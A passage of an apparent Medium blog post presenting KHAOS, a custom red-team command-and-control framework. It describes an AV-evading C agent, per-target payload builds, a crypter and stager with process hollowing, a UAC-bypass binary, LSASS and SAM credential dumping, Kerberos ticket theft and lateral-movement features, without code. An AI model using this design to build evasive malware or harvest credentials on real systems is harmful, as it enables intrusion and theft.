KHAOS C2: Building a Fully Custom Command and Control from Scratch | by Ilyes AZIZ | Jun, 2026 | MediumSitemapOpen in appSign up<br>Sign in
Medium Logo
Get app<br>Write
Search
Sign up<br>Sign in
KHAOS C2: Building a Fully Custom Command and Control from Scratch
Ilyes AZIZ
17 min read·<br>3 hours ago
Listen
Share
Every red team engagement starts the same way. You set up your infrastructure, stage your payload, and within minutes Defender flags it. You swap to Havoc. Same result. You try Sliver, tweak the profile, recompile. Flagged again. The problem is not the framework. The problem is that the moment a tool gets popular, it becomes a signature. Security vendors monitor open-source repositories, pull every release, feed binaries into their detection pipelines, and ship updates. By the time you are using a public C2, it is already a known quantity. Cobalt Strike costs $3,000 a year and its indicators are in every public YARA ruleset. Havoc and Sliver are flagged out of the box. The problem is not the features. It is the fingerprint.<br>The answer is not finding a better public framework. It is building your own.<br>KHAOS is a full-stack C2 framework built from scratch. No borrowed loader, no reused beacon, no dependency on a runtime that carries a recognizable fingerprint. Every component is custom: a Windows agent written in pure C, a dedicated crypter for delivery, a stager that handles in-memory decryption and injection, a separate UAC elevator called the lifter, a Python server, and a web interface built in React. Each component was designed and implemented independently. Each one can be understood, modified, and replaced without touching anything else.<br>The stack<br>Press enter or click to view image in full size
InterfaceThe operator interface is a web application built in React. It connects to the Python server over WebSocket, displays active agents, manages tasks, and surfaces collected data: screenshots, harvested credentials, file transfers, session logs. Access it from any browser pointed at the server. The UI is purely operational: it reflects what the server knows about active agents and gives the operator a way to interact with them without touching a terminal. A Tauri wrapper is also available for operators who prefer a standalone desktop application over a browser tab.<br>The server is a Python application built on FastAPI. It handles agent authentication, beacon parsing, task queuing, and data storage. It also exposes a build endpoint that compiles agent payloads on demand with freshly generated cryptographic parameters, so each payload delivered to a target is unique at the byte level. The server can run on a VPS, behind a redirector, or on the operator’s own machine during a local engagement.<br>The agent is the core of everything. It is written in pure C with no external library dependencies beyond the Windows API. It has no C++ runtime, no Rust standard library, no framework code that would leave a recognizable pattern in the binary. The import table is deliberately sparse: sensitive API calls are resolved at runtime through the PEB rather than declared as imports. The agent handles communication, command execution, and all post-exploitation logic within a single binary that is designed from the ground up to leave as small a footprint as possible.<br>The crypter and stager handle delivery. The crypter encodes the compiled agent and wraps it in a loader that performs environment checks before doing anything else. The stager decrypts the payload in memory and injects it into a target process via process hollowing. The lifter is a standalone binary responsible for UAC bypass and privilege elevation. It exists separately from the agent on purpose: it does one thing, exits, and can be replaced independently if a bypass technique gets patched.<br>What the agent does<br>Press enter or click to view image in full size
FeaturesThis is not a minimal beacon with a shell command attached. The agent covers the full post-exploitation surface that an engagement actually requires, and it does so without relying on external tooling dropped to disk.<br>On the post-exploitation side, operators get interactive shell execution, process enumeration, screenshot capture, file system management including upload and download, registry read and write, and WMI query execution. These are the basics, but they are implemented cleanly without the overhead of a .NET runtime or a Python interpreter running inside the target process.<br>Credential access goes deeper. The agent can dump LSASS memory, extract SAM hashes, harvest Kerberos tickets, and enumerate stored credentials through the Windows Credential Manager API. Each of these runs in-memory through dynamically resolved APIs with no auxiliary tool dropped to disk.<br>Lateral movement support includes an integrated port scanner, a SOCKS5 proxy, reverse port forwarding, and SMB relay. The SOCKS5 proxy lets operators route arbitrary tooling through a compromised host without staging anything...